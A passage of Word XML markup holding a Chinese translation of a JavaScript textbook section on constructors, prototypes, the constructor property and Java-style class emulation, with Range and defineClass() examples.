        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var F=function(){};//</w:t>
      </w:r>
      <w:r>
        <w:t>这是一个函数对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p=F.prototype;//</w:t>
      </w:r>
      <w:r>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>相关联的原型对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var c=p.constructor;//</w:t>
      </w:r>
      <w:r>
        <w:t>这是与原型相关联的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c===F//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>tru</w:t>
      </w:r>
      <w:r>
        <w:t>e:</w:t>
      </w:r>
      <w:r>
        <w:t>对于任意函数</w:t>
      </w:r>
      <w:r>
        <w:t>F.prototype.constructor==F</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以看到构造函数的原型中存在预先定义好的</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性，这意味着对象通常继承的</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>均指代它们的构造函数。由于构造函数是类的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>公共标识</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，因此这个</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性为对象提供了类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=new F();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建类</w:t>
      </w:r>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>的一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.constructor===F//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代这个类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如图</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>所示，图</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>展示了构造函数和原型对象之间的关系，包括原型到构造函数的反向引用以及构造函数创建的实例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4058728" cy="961845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="15" name="00015.jpeg" descr="000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00015.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4058728" cy="961845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　构造函数及其原型和实例</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，图</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>Range()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数作为示例，但实际上，例</w:t>
      </w:r>
      <w:r>
        <w:t>9-2</w:t>
      </w:r>
      <w:r>
        <w:t>中定义的</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类使用它自身的一个新对象重写预定义的</w:t>
      </w:r>
      <w:r>
        <w:t>Range.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这个新定义的原型对象不含有</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性。因此</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类的实例也不含有</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性。我们可以通过补救措施来修正这个问题，显式给原型添加一个构造函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>.prototype={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>constructor:Range,//</w:t>
      </w:r>
      <w:r>
        <w:t>显式设置构造函数反向引用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>includes:function(x){return this.from</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=x</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:function(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var x=Math.ceil(this.from);x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;x++)f(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){return"("+this.from+"..."+this.to+")";}</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另一种常见的解决办法是使用预</w:t>
      </w:r>
      <w:r>
        <w:t>定义的原型对象，预定义的原型对象包含</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性，然后依次给原型对象添加方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>扩展预定义的</w:t>
      </w:r>
      <w:r>
        <w:t>Range.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而不重写之</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这样就自动创建</w:t>
      </w:r>
      <w:r>
        <w:t>Range.prototype.constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.prototype.includes=function(x){return this.from</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=x</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.prototype.foreach=function(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var x=Math.ceil(this.fro</w:t>
      </w:r>
      <w:r>
        <w:t>m);x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;x++)f(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.prototype.toString=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return"("+this.from+"..."+this.to+")";</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228" w:name="9_3_JavaScriptZhong_JavaShi_De_Lei_Ji_Ch"/>
      <w:r>
        <w:t>9.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>式的类继承</w:t>
      </w:r>
      <w:bookmarkEnd w:id="228"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果你有过</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>或其他类似强类型面向对象语言的开发经历的话，在你的脑海中，类成员的模样可能会是这个样子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实例字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>它们是基于实例的属性或变量，用以保存独立对象的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实例方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>它们是类的所有实例所共享的方法，由每个独立的实例调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些属性或变量是属于类的，而不是属于类的某个实例的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些方法是属于类的，而不是属于类的某个实例的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的一个不同之处在于，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数都是以值的形式出现的，方法和字段之间并没有太大的区别。如果</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>属性值是函数，那么这个属性就定义一个方法；否则，它只是一个普通的属性或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。尽管存在诸多差异，我们还是可以用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>模拟出</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中的这四种类成员类型。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的类牵扯三种不同的对象（参照图</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>），三种对象的属性的行为和下面三种类成员</w:t>
      </w:r>
      <w:r>
        <w:t>非常相似：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造函数对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>之前提到，构造函数（对象）为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的类定义了名字。任何添加到这个构造函数对象中的属性都是类字段和类方法（如果属性值是函数的话就是类方法）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>原型对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>原型对象的属性被类的所有实例所继承，如果原型对象的属性值是函数的话，这个函数就作为类的实例的方法来调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实例对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类的每个实例都是一个独立的对象，直接给这个实例定义的属性是不会为所有实例对象所共享的。定义在实例上的非函数属性，实际上是实例的字段。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中定义类的步骤可以缩减为一个分三步的算法。第一步，</w:t>
      </w:r>
      <w:r>
        <w:t>先定义一个构造函数，并设置初始化新对象的实例属性。第二步，给构造函数的</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义实例的方法。第三步，给构造函数定义类字段和类属性。我们可以将这三个步骤封装进一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>defineClass()</w:t>
      </w:r>
      <w:r>
        <w:t>函数中（这里用到了例</w:t>
      </w:r>
      <w:r>
        <w:t>6-2</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>函数和例</w:t>
      </w:r>
      <w:r>
        <w:t>8-3</w:t>
      </w:r>
      <w:r>
        <w:t>中的改进版）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个用以定义简单类的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function defineClass(constructor,//</w:t>
      </w:r>
      <w:r>
        <w:t>用以设置实例的属性的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>methods,//</w:t>
      </w:r>
      <w:r>
        <w:t>实例的方法，复制至原型中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statics)//</w:t>
      </w:r>
      <w:r>
        <w:t>类属性，复制至构造函数中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>(methods)extend(constructor.prototype,methods);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(statics)extend(constructor,statics);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return constructor;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类的另一个实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var SimpleRange=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>defineClass(function(f,t){this.f=f;this.t=t;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>includes:function(x){return this.f</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=x</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.t;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){return this.f+"..."+this.t;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{upto:function(t){return new SimpleRange(0,t);}});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-3</w:t>
      </w:r>
      <w:r>
        <w:t>中定义类的代码更长一些。这里定义了一个表示复数的类，这段代码展示了如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来模拟实现</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>式的类成</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>员。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-3</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码没有用到上面的</w:t>
      </w:r>
      <w:r>
        <w:t>defineClass()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，而是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>手动</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-3</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>Complex.js</w:t>
      </w:r>
      <w:r>
        <w:t>：表示复数的类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*Complex.js:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个文</w:t>
      </w:r>
      <w:r>
